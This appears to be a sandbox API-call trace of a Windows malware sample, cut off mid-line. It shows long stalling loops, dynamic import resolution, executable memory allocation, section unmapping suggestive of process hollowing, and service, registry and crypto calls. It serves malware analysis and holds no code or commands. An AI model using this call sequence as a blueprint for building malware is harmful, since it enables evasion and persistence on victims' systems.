[0069.511] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.511] GetKeyState (nVirtKey=1) returned 0 [0069.511] GetStretchBltMode (hdc=0x1) returned 0 [0069.511] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.511] GetKeyState (nVirtKey=1) returned 0 [0069.511] GetStretchBltMode (hdc=0x1) returned 0 [0069.511] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.511] GetKeyState (nVirtKey=1) returned 0 [0069.511] GetStretchBltMode (hdc=0x1) returned 0 [0069.511] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.511] GetKeyState (nVirtKey=1) returned 0 [0069.511] GetStretchBltMode (hdc=0x1) returned 0 [0069.511] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.512] GetKeyState (nVirtKey=1) returned 0 [0069.512] GetStretchBltMode (hdc=0x1) returned 0 [0069.512] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.512] GetKeyState (nVirtKey=1) returned 0 [0069.512] GetStretchBltMode (hdc=0x1) returned 0 [0069.512] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.512] GetKeyState (nVirtKey=1) returned 0 [0069.512] GetStretchBltMode (hdc=0x1) returned 0 [0069.512] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.512] GetKeyState (nVirtKey=1) returned 0 [0069.512] GetStretchBltMode (hdc=0x1) returned 0 [0069.512] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.512] GetKeyState (nVirtKey=1) returned 0 [0069.512] GetStretchBltMode (hdc=0x1) returned 0 [0069.512] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.512] GetKeyState (nVirtKey=1) returned 0 [0069.513] GetStretchBltMode (hdc=0x1) returned 0 [0069.513] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.513] GetKeyState (nVirtKey=1) returned 0 [0069.513] GetStretchBltMode (hdc=0x1) returned 0 [0069.513] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.513] GetKeyState (nVirtKey=1) returned 0 [0069.513] GetStretchBltMode (hdc=0x1) returned 0 [0069.513] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.513] GetKeyState (nVirtKey=1) returned 0 [0069.513] GetStretchBltMode (hdc=0x1) returned 0 [0069.513] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.513] GetKeyState (nVirtKey=1) returned 0 [0069.513] GetStretchBltMode (hdc=0x1) returned 0 [0069.513] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.513] GetKeyState (nVirtKey=1) returned 0 [0069.513] GetStretchBltMode (hdc=0x1) returned 0 [0069.513] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.514] GetKeyState (nVirtKey=1) returned 0 [0069.514] GetStretchBltMode (hdc=0x1) returned 0 [0069.514] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.514] GetKeyState (nVirtKey=1) returned 0 [0069.514] GetStretchBltMode (hdc=0x1) returned 0 [0069.514] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.514] GetKeyState (nVirtKey=1) returned 0 [0069.514] GetStretchBltMode (hdc=0x1) returned 0 [0069.514] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.514] GetKeyState (nVirtKey=1) returned 0 [0069.514] GetStretchBltMode (hdc=0x1) returned 0 [0069.514] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.514] GetKeyState (nVirtKey=1) returned 0 [0069.514] GetStretchBltMode (hdc=0x1) returned 0 [0069.514] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.515] GetKeyState (nVirtKey=1) returned 0 [0069.515] GetStretchBltMode (hdc=0x1) returned 0 [0069.515] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.515] GetKeyState (nVirtKey=1) returned 0 [0069.515] GetStretchBltMode (hdc=0x1) returned 0 [0069.515] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.515] GetKeyState (nVirtKey=1) returned 0 [0069.515] GetStretchBltMode (hdc=0x1) returned 0 [0069.515] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.515] GetKeyState (nVirtKey=1) returned 0 [0069.515] GetStretchBltMode (hdc=0x1) returned 0 [0069.515] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.515] GetKeyState (nVirtKey=1) returned 0 [0069.515] GetStretchBltMode (hdc=0x1) returned 0 [0069.515] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.515] GetKeyState (nVirtKey=1) returned 0 [0069.516] GetStretchBltMode (hdc=0x1) returned 0 [0069.516] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.516] GetKeyState (nVirtKey=1) returned 0 [0069.516] GetStretchBltMode (hdc=0x1) returned 0 [0069.516] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.516] GetKeyState (nVirtKey=1) returned 0 [0069.516] GetStretchBltMode (hdc=0x1) returned 0 [0069.516] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.516] GetKeyState (nVirtKey=1) returned 0 [0069.516] GetStretchBltMode (hdc=0x1) returned 0 [0069.516] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.516] GetKeyState (nVirtKey=1) returned 0 [0069.516] GetStretchBltMode (hdc=0x1) returned 0 [0069.516] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.516] GetKeyState (nVirtKey=1) returned 0 [0069.516] GetStretchBltMode (hdc=0x1) returned 0 [0069.516] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.517] GetKeyState (nVirtKey=1) returned 0 [0069.517] GetStretchBltMode (hdc=0x1) returned 0 [0069.517] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.517] GetKeyState (nVirtKey=1) returned 0 [0069.517] GetStretchBltMode (hdc=0x1) returned 0 [0069.517] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.517] GetKeyState (nVirtKey=1) returned 0 [0069.517] GetStretchBltMode (hdc=0x1) returned 0 [0069.517] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.517] GetKeyState (nVirtKey=1) returned 0 [0069.517] GetStretchBltMode (hdc=0x1) returned 0 [0069.517] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.518] GetKeyState (nVirtKey=1) returned 0 [0069.518] GetStretchBltMode (hdc=0x1) returned 0 [0069.518] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.518] GetKeyState (nVirtKey=1) returned 0 [0069.518] GetStretchBltMode (hdc=0x1) returned 0 [0069.518] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.518] GetKeyState (nVirtKey=1) returned 0 [0069.518] GetStretchBltMode (hdc=0x1) returned 0 [0069.518] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.518] GetKeyState (nVirtKey=1) returned 0 [0069.518] GetStretchBltMode (hdc=0x1) returned 0 [0069.518] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.518] GetKeyState (nVirtKey=1) returned 0 [0069.518] GetStretchBltMode (hdc=0x1) returned 0 [0069.518] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.519] GetKeyState (nVirtKey=1) returned 0 [0069.519] GetStretchBltMode (hdc=0x1) returned 0 [0069.519] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.519] GetKeyState (nVirtKey=1) returned 0 [0069.519] GetStretchBltMode (hdc=0x1) returned 0 [0069.519] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.519] GetKeyState (nVirtKey=1) returned 0 [0069.519] GetStretchBltMode (hdc=0x1) returned 0 [0069.519] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.519] GetKeyState (nVirtKey=1) returned 0 [0069.519] GetStretchBltMode (hdc=0x1) returned 0 [0069.519] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.519] GetKeyState (nVirtKey=1) returned 0 [0069.519] GetStretchBltMode (hdc=0x1) returned 0 [0069.519] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.519] GetKeyState (nVirtKey=1) returned 0 [0069.519] GetStretchBltMode (hdc=0x1) returned 0 [0069.520] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.520] GetKeyState (nVirtKey=1) returned 0 [0069.520] GetStretchBltMode (hdc=0x1) returned 0 [0069.520] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.520] GetKeyState (nVirtKey=1) returned 0 [0069.520] GetStretchBltMode (hdc=0x1) returned 0 [0069.520] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.520] GetKeyState (nVirtKey=1) returned 0 [0069.520] GetStretchBltMode (hdc=0x1) returned 0 [0069.520] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.520] GetKeyState (nVirtKey=1) returned 0 [0069.520] GetStretchBltMode (hdc=0x1) returned 0 [0069.520] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.520] GetKeyState (nVirtKey=1) returned 0 [0069.520] GetStretchBltMode (hdc=0x1) returned 0 [0069.520] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.521] GetKeyState (nVirtKey=1) returned 0 [0069.521] GetStretchBltMode (hdc=0x1) returned 0 [0069.521] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.521] GetKeyState (nVirtKey=1) returned 0 [0069.521] GetStretchBltMode (hdc=0x1) returned 0 [0069.521] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.521] GetKeyState (nVirtKey=1) returned 0 [0069.521] GetStretchBltMode (hdc=0x1) returned 0 [0069.521] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.521] GetKeyState (nVirtKey=1) returned 0 [0069.521] GetStretchBltMode (hdc=0x1) returned 0 [0069.521] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.521] GetKeyState (nVirtKey=1) returned 0 [0069.521] GetStretchBltMode (hdc=0x1) returned 0 [0069.521] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.521] GetKeyState (nVirtKey=1) returned 0 [0069.521] GetStretchBltMode (hdc=0x1) returned 0 [0069.522] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.522] GetKeyState (nVirtKey=1) returned 0 [0069.522] GetStretchBltMode (hdc=0x1) returned 0 [0069.522] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.522] GetKeyState (nVirtKey=1) returned 0 [0069.522] GetStretchBltMode (hdc=0x1) returned 0 [0069.522] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.522] GetKeyState (nVirtKey=1) returned 0 [0069.522] GetStretchBltMode (hdc=0x1) returned 0 [0069.522] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.522] GetKeyState (nVirtKey=1) returned 0 [0069.522] GetStretchBltMode (hdc=0x1) returned 0 [0069.522] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.522] GetKeyState (nVirtKey=1) returned 0 [0069.522] GetStretchBltMode (hdc=0x1) returned 0 [0069.522] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.523] GetKeyState (nVirtKey=1) returned 0 [0069.523] GetStretchBltMode (hdc=0x1) returned 0 [0069.523] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.523] GetKeyState (nVirtKey=1) returned 0 [0069.523] GetStretchBltMode (hdc=0x1) returned 0 [0069.523] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.523] GetKeyState (nVirtKey=1) returned 0 [0069.523] GetStretchBltMode (hdc=0x1) returned 0 [0069.523] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.523] GetKeyState (nVirtKey=1) returned 0 [0069.523] GetStretchBltMode (hdc=0x1) returned 0 [0069.523] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.523] GetKeyState (nVirtKey=1) returned 0 [0069.523] GetStretchBltMode (hdc=0x1) returned 0 [0069.523] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.523] GetKeyState (nVirtKey=1) returned 0 [0069.523] GetStretchBltMode (hdc=0x1) returned 0 [0069.524] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.524] GetKeyState (nVirtKey=1) returned 0 [0069.524] GetStretchBltMode (hdc=0x1) returned 0 [0069.524] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.524] GetKeyState (nVirtKey=1) returned 0 [0069.524] GetStretchBltMode (hdc=0x1) returned 0 [0069.524] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.524] GetKeyState (nVirtKey=1) returned 0 [0069.524] GetStretchBltMode (hdc=0x1) returned 0 [0069.524] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.524] GetKeyState (nVirtKey=1) returned 0 [0069.524] GetStretchBltMode (hdc=0x1) returned 0 [0069.524] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.524] GetKeyState (nVirtKey=1) returned 0 [0069.524] GetStretchBltMode (hdc=0x1) returned 0 [0069.524] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.525] GetKeyState (nVirtKey=1) returned 0 [0069.525] GetStretchBltMode (hdc=0x1) returned 0 [0069.525] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.525] GetKeyState (nVirtKey=1) returned 0 [0069.525] GetStretchBltMode (hdc=0x1) returned 0 [0069.525] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.525] GetKeyState (nVirtKey=1) returned 0 [0069.525] GetStretchBltMode (hdc=0x1) returned 0 [0069.525] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.525] GetKeyState (nVirtKey=1) returned 0 [0069.525] GetStretchBltMode (hdc=0x1) returned 0 [0069.525] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.525] GetKeyState (nVirtKey=1) returned 0 [0069.525] GetStretchBltMode (hdc=0x1) returned 0 [0069.525] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.525] GetKeyState (nVirtKey=1) returned 0 [0069.525] GetStretchBltMode (hdc=0x1) returned 0 [0069.526] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.536] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0069.536] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0069.536] GetProcAddress (hModule=0x76d30000, lpProcName="UnmapViewOfFile") returned 0x76d41826 [0069.536] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0069.536] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExA") returned 0x76d44913 [0069.537] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0069.537] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0069.537] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0069.537] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0069.537] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0069.537] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0069.537] GetProcAddress (hModule=0x76d30000, lpProcName="GetTempPathA") returned 0x76d6276c [0069.538] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0069.538] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0069.538] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0069.538] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0069.538] GetProcAddress (hModule=0x76c10000, lpProcName="VirtualAlloc") returned 0x76c1e365 [0069.538] VirtualAlloc (lpAddress=0x0, dwSize=0xe000, flAllocationType=0x3000, flProtect=0x40) returned 0x2e0000 [0069.541] VirtualProtect (in: lpAddress=0x400000, dwSize=0x11000, flNewProtect=0x40, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 1 [0069.545] LoadLibraryExA (lpLibFileName="ntdll.dll", hFile=0x0, dwFlags=0x0) returned 0x77c40000 [0069.546] GetProcAddress (hModule=0x77c40000, lpProcName="RtlImageNtHeader") returned 0x77c73164 [0069.546] GetProcAddress (hModule=0x77c40000, lpProcName="NtUnmapViewOfSection") returned 0x77c5fc70 [0069.546] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenSection") returned 0x77c5fdb8 [0069.546] GetProcAddress (hModule=0x77c40000, lpProcName="NtMapViewOfSection") returned 0x77c5fc40 [0069.546] GetProcAddress (hModule=0x77c40000, lpProcName="NtDeleteFile") returned 0x77c609d4 [0069.546] GetProcAddress (hModule=0x77c40000, lpProcName="NtClose") returned 0x77c5f9d0 [0069.547] GetProcAddress (hModule=0x77c40000, lpProcName="RtlUnwind") returned 0x77c86d39 [0069.547] GetProcAddress (hModule=0x77c40000, lpProcName="_chkstk") returned 0x77c7ad68 [0069.547] GetProcAddress (hModule=0x77c40000, lpProcName="memset") returned 0x77c6df20 [0069.547] GetProcAddress (hModule=0x77c40000, lpProcName="memcpy") returned 0x77c62340 [0069.547] GetProcAddress (hModule=0x77c40000, lpProcName="RtlNtStatusToDosError") returned 0x77c761ed [0069.547] GetProcAddress (hModule=0x77c40000, lpProcName="wcschr") returned 0x77c77f1c [0069.547] GetProcAddress (hModule=0x77c40000, lpProcName="memcmp") returned 0x77c72265 [0069.547] GetProcAddress (hModule=0x77c40000, lpProcName="NtFsControlFile") returned 0x77c5fde8 [0069.548] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateFile") returned 0x77c600a4 [0069.548] GetProcAddress (hModule=0x77c40000, lpProcName="_wcslwr") returned 0x77d14b6b [0069.548] GetProcAddress (hModule=0x77c40000, lpProcName="_snprintf") returned 0x77d14760 [0069.548] GetProcAddress (hModule=0x77c40000, lpProcName="_snwprintf") returned 0x77c72417 [0069.548] GetProcAddress (hModule=0x77c40000, lpProcName="RtlInitUnicodeString") returned 0x77c6e208 [0069.548] GetProcAddress (hModule=0x77c40000, lpProcName="_allmul") returned 0x77c82760 [0069.548] GetProcAddress (hModule=0x77c40000, lpProcName="_aulldiv") returned 0x77c9b140 [0069.549] GetProcAddress (hModule=0x77c40000, lpProcName="_aulldvrm") returned 0x77c6f880 [0069.549] GetProcAddress (hModule=0x77c40000, lpProcName="NtQueryVirtualMemory") returned 0x77c5fbc8 [0069.549] LoadLibraryExA (lpLibFileName="SHLWAPI.dll", hFile=0x0, dwFlags=0x0) returned 0x772f0000 [0069.550] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsW") returned 0x773045bf [0069.550] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindFileNameW") returned 0x7730bb71 [0069.550] GetProcAddress (hModule=0x772f0000, lpProcName="StrRChrW") returned 0x77303ef0 [0069.550] GetProcAddress (hModule=0x772f0000, lpProcName="StrStrW") returned 0x772fe52d [0069.550] GetProcAddress (hModule=0x772f0000, lpProcName="StrToIntExW") returned 0x77320196 [0069.551] GetProcAddress (hModule=0x772f0000, lpProcName="StrTrimW") returned 0x773031bc [0069.551] GetProcAddress (hModule=0x772f0000, lpProcName="PathCombineW") returned 0x7730c39c [0069.551] GetProcAddress (hModule=0x772f0000, lpProcName="StrCmpNW") returned 0x77305cc4 [0069.551] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindExtensionW") returned 0x7730a1b9 [0069.551] GetProcAddress (hModule=0x772f0000, lpProcName="StrChrW") returned 0x77304640 [0069.551] LoadLibraryExA (lpLibFileName="KERNEL32.dll", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0069.551] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0069.551] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0069.552] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0069.552] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0069.552] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0069.552] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatW") returned 0x76d6828e [0069.552] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0069.552] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0069.552] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0069.553] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenW") returned 0x76d41700 [0069.553] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0069.553] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0069.553] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0069.553] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0069.553] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0069.553] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0069.554] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceExW") returned 0x76d5d50f [0069.554] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0069.554] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileAttributesW") returned 0x76d5d4f7 [0069.554] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0069.554] GetProcAddress (hModule=0x76d30000, lpProcName="MoveFileW") returned 0x76d59af0 [0069.554] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0069.554] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedIncrement") returned 0x76d41400 [0069.554] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0069.555] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0069.555] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileW") returned 0x76d6830d [0069.555] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0069.555] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0069.555] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventA") returned 0x76d4328c [0069.555] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0069.555] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0069.556] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0069.556] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcmpW") returned 0x76d45929 [0069.556] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0069.556] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForMultipleObjects") returned 0x76d44220 [0069.556] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0069.556] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0069.557] GetProcAddress (hModule=0x76d30000, lpProcName="GetExitCodeProcess") returned 0x76d5174d [0069.557] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryW") returned 0x76d44259 [0069.557] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0069.557] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0069.557] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0069.557] GetProcAddress (hModule=0x76d30000, lpProcName="ResetEvent") returned 0x76d416dd [0069.557] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedDecrement") returned 0x76d413f0 [0069.558] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0069.558] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0069.558] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentDirectoryW") returned 0x76d45611 [0069.558] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileW") returned 0x76d44435 [0069.558] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0069.558] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSection") returned 0x77c72c42 [0069.558] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0069.559] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0069.559] GetProcAddress (hModule=0x76d30000, lpProcName="QueryDosDeviceW") returned 0x76d6ceec [0069.559] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0069.559] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalDriveStringsW") returned 0x76dc436f [0069.559] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0069.559] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileAttributesW") returned 0x76d41b18 [0069.559] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceFrequency") returned 0x76d441f0 [0069.560] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0069.560] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileMappingW") returned 0x76d41909 [0069.560] GetProcAddress (hModule=0x76d30000, lpProcName="GetTempPathW") returned 0x76d5d4dc [0069.560] GetProcAddress (hModule=0x76d30000, lpProcName="UnmapViewOfFile") returned 0x76d41826 [0069.560] GetProcAddress (hModule=0x76d30000, lpProcName="MapViewOfFile") returned 0x76d418f1 [0069.560] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0069.560] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0069.560] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSize") returned 0x76d4196e [0069.561] GetProcAddress (hModule=0x76d30000, lpProcName="GetTempFileNameW") returned 0x76d6d1b6 [0069.561] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0069.561] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileTime") returned 0x76d5ecbb [0069.561] GetProcAddress (hModule=0x76d30000, lpProcName="GetWindowsDirectoryW") returned 0x76d443e2 [0069.561] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0069.561] GetProcAddress (hModule=0x77710000, lpProcName="CreateServiceW") returned 0x7773712c [0069.561] GetProcAddress (hModule=0x77710000, lpProcName="RegEnumKeyW") returned 0x7772445b [0069.562] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0069.562] GetProcAddress (hModule=0x77710000, lpProcName="CryptGenRandom") returned 0x7771dfc8 [0069.562] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0069.562] GetProcAddress (hModule=0x77710000, lpProcName="GetSidSubAuthority") returned 0x77720e24 [0069.562] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0069.562] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0069.562] GetProcAddress (hModule=0x77710000, lpProcName="GetSidSubAuthorityCount") returned 0x77720e0c [0069.563] GetProcAddress (hModule=0x77710000, lpProcName="OpenSCManagerW") returned 0x7771ca64 [0069.563] GetProcAddress (hModule=0x77710000, lpProcName="SetServiceStatus") returned 0x7771c7a6 [0069.563] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteValueW") returned 0x7771cf31 [0069.563] GetProcAddress (hModule=0x77710000, lpProcName="DeleteService") returned 0x7773715c [0069.563] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0069.563] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0069.563] GetProcAddress (hModule=0x77710000, lpProcName="StartServiceW") returned 0x77717974 [0069.563] GetProcAddress (hModule=0x77710000, lpProcName="CloseServiceHandle") returned 0x7772369c [0069.564] GetProcAddress (hModule=0x77710000, lpProcName="ControlService") returned 0x77737144 [0069.564] GetProcAddress (hModule=0x77710000, lpProcName="RegisterServiceCtrlHandlerW") returned 0x7771a97d [0069.564] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0069.564] GetProcAddress (hModule=0x77710000, lpProcName="QueryServiceStatusEx") returned 0x7771798c [0069.588] GetProcAddress (hModule=0x77710000, lpProcName="StartServiceCtrlDispatcherW") returned 0x7771a965 [0069.588] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0069.588] LoadLibraryExA (lpLibFileName="SHELL32.dll", hFile=0x0, dwFlags=0x0) returned 0x759d0000 [0069.589] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0069.589] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0069.589] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x76620000 [0069.592] GetProcAddress (hModule=0x76620000, lpProcName="CreateStreamOnHGlobal") returned 0x7664363b [0069.592] VirtualProtect (in: lpAddress=0x401000, dwSize=0x77c7, flNewProtect=0x2d0160, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 0 [0069.615] VirtualProtect (in: lpAddress=0x409000, dwSize=0xe90, flNewProtect=0x2d0140, 